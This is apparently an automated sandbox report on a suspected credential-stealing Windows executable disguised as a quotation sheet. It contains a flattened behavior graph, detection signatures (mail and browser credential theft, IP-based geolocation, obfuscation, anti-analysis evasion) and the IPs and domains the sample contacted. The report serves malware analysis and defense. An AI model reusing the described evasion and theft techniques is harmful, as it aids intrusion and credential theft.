behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1480054 Sample: z1QuotationSheetVSAA6656776.exe Startdate: 24/07/2024 Architecture: WINDOWS Score: 100 38 reallyfreegeoip.org 2->38 40 checkip.dyndns.org 2->40 42 3 other IPs or domains 2->42 50 Found malware configuration 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 Multi AV Scanner detection for submitted file 2->54 58 3 other signatures 2->58 8 z1QuotationSheetVSAA6656776.exe 37 2->8         started        signatures3 56 Tries to detect the country of the analysis system (by using the IP) 38->56 process4 file5 34 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->34 dropped 36 C:\Users\user\AppData\Local\...\System.dll, PE32 8->36 dropped 60 Obfuscated command line found 8->60 62 Mass process execution to delay analysis 8->62 64 Switches to a custom stack to bypass stack traces 8->64 12 z1QuotationSheetVSAA6656776.exe 15 8 8->12         started        16 cmd.exe 8->16         started        18 cmd.exe 8->18         started        20 62 other processes 8->20 signatures6 process7 dnsIp8 44 reallyfreegeoip.org 172.67.177.134, 443, 49782, 49783 CLOUDFLARENETUS United States 12->44 46 checkip.dyndns.com 158.101.44.242, 49781, 80 ORACLE-BMC-31898US United States 12->46 48 2 other IPs or domains 12->48 66 Tries to steal Mail credentials (via file / registry access) 12->66 68 Tries to harvest and steal browser information (history, passwords, etc) 12->68 22 Conhost.exe 16->22         started        24 Conhost.exe 18->24         started        26 Conhost.exe 20->26         started        28 Conhost.exe 20->28         started        30 Conhost.exe 20->30         started        32 59 other processes 20->32 signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.251.111.132
 drive.usercontent.google.com United States
15169 GOOGLEUS false
142.251.167.113
 drive.google.com United States
15169 GOOGLEUS false
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
172.67.177.134
 reallyfreegeoip.org United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
drive.google.com 142.251.167.113 true
drive.usercontent.google.com 142.251.111.132 true
reallyfreegeoip.org 172.67.177.134 true
checkip.dyndns.com 158.101.44.242 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://checkip.dyndns.org/ false
  • Avira URL Cloud: safe
 unknown
https://reallyfreegeoip.org/xml/149.18.24.104 false
  • Avira URL Cloud: safe
 unknown